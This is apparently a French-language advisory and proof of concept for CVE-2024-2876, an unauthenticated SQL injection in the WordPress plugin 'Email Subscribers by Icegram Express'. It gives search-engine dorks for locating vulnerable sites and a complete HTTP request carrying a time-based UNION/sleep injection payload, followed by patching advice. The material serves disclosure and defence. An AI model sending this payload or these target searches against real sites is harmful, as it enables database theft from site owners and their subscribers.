
Preuve de concept d'exploitation pour CVE-2024-2876, une injection SQL critique dans le plugin WordPress Email Subscribers by Icegram Express, permettant à des attaquants non authentifiés d'exécuter des requêtes SQL arbitraires.
CVE-2024-2876 est une vulnérabilité de sécurité critique découverte dans le plugin "Email Subscribers by Icegram Express" pour WordPress. Cette vulnérabilité affecte les versions jusqu'à la 5.7.14 incluse et présente des risques importants pour plus de 90 000 sites web.
La vulnérabilité est une faille d'injection SQL qui permet à des attaquants non authentifiés d'exécuter des requêtes SQL malveillantes sur les bases de données WordPress affectées. En manipulant les entrées utilisateur qui ne sont pas correctement assainies, les attaquants peuvent extraire des informations sensibles telles que les noms d'utilisateur, les adresses e-mail, les hachages de mots de passe et les listes d'abonnés.
L'injection SQL se produit dans la fonction run de la classe du plugin, où une validation insuffisante des entrées conduit à l'exécution non autorisée de code SQL. Cela compromet l'intégrité et la confidentialité des données stockées dans la base de données WordPress.
IG_ES_Subscribers_QueryFOFA : body="/wp-content/plugins/email-subscribers/"
publicwww : "/wp-content/plugins/email-subscribers/"
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
Mise à jour immédiate : Si vous utilisez le plugin "Email Subscribers by Icegram Express", mettez-le à niveau vers la version 5.7.15 ou une version ultérieure immédiatement pour appliquer le correctif de sécurité.
Audits réguliers : Examinez et mettez à jour régulièrement tous les plugins et thèmes WordPress vers leurs dernières versions pour garantir la sécurité.
Plugins de sécurité : Utilisez des plugins de sécurité WordPress réputés pour renforcer les défenses contre l'injection SQL et d'autres menaces cybernétiques.
Politiques de mots de passe robustes : Mettez en œuvre des mots de passe forts et uniques pour tous les comptes liés à votre site WordPress afin de réduire les risques d'accès non autorisé.
Le fait de ne pas mettre à jour le plugin affecté peut laisser les sites web vulnérables aux violations de données et aux accès non autorisés. Compte tenu de l'utilisation répandue de ce plugin, une action immédiate est cruciale pour sécuriser les installations.